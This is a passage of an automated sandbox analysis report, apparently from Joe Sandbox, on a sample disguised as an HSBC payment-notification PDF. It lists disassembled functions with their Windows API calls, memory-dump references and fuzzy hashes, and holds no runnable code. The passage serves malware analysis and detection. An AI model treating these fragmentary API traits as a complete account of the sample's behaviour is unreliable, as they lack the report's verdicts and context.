                                                                                                                                                    • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                                                                                    • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                                                                                                                    Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                                                                                                                      • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004770D6
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 004770DD
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                                                                                                                      • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0047713B
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4137160315-0
                                                                                                                                                    • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                                                                                    • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                                                                                                                    • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                                                                                    • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                                                                                                                    Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                      • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                      • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                      • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                      • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                    • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                    • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                                                                                                    • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                    • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                                                                                                                    Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                                    • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                                                                                    • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                                                                                                                    • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                                                                                    • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                                                                                                                    Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                    • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                                                                                    • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                                                                                                                    • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                                                                                    • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                                                                                                    Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                    • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                                                                                    • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                                                                                                                    • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                                                                                    • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                                                                                                                    Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                                                                                      • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                    • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                                                                                    • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                                                                                                                    • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                                                                                    • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                                                                                                                    Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                    • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                                                                                    • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                                                                                                                    • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                                                                                    • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                                                                                                                    Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00478613
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                                                                                      • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                                                                                      • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                                                                                      • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                                                    • Opcode ID: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                                                                                                                                                    • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                                                                                                                    • Opcode Fuzzy Hash: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                                                                                                                                                    • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                                                                                                                    Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                    • _memset.LIBCMT ref: 00462B87
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                                                    • Opcode ID: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                                                                                                                                                    • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                                                                                                                    • Opcode Fuzzy Hash: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                                                                                                                                                    • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                                                                                                                    Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_free
                                                                                                                                                    • String ID: 3cA$_A
                                                                                                                                                    • API String ID: 2620147621-3480954128
                                                                                                                                                    • Opcode ID: cd52e68eb8994818202cc38379586957e4432314458df140b9a3ed5bd26668b5
                                                                                                                                                    • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                                                                                                                    • Opcode Fuzzy Hash: cd52e68eb8994818202cc38379586957e4432314458df140b9a3ed5bd26668b5
                                                                                                                                                    • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                                                                                                                    Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$_memmove
                                                                                                                                                    • String ID: 3cA$ERCP
                                                                                                                                                    • API String ID: 2532777613-1471582817
                                                                                                                                                    • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                                                                                    • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                                                                                                                    • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                                                                                    • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                                                                                                                    Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                    Download Yara Rule
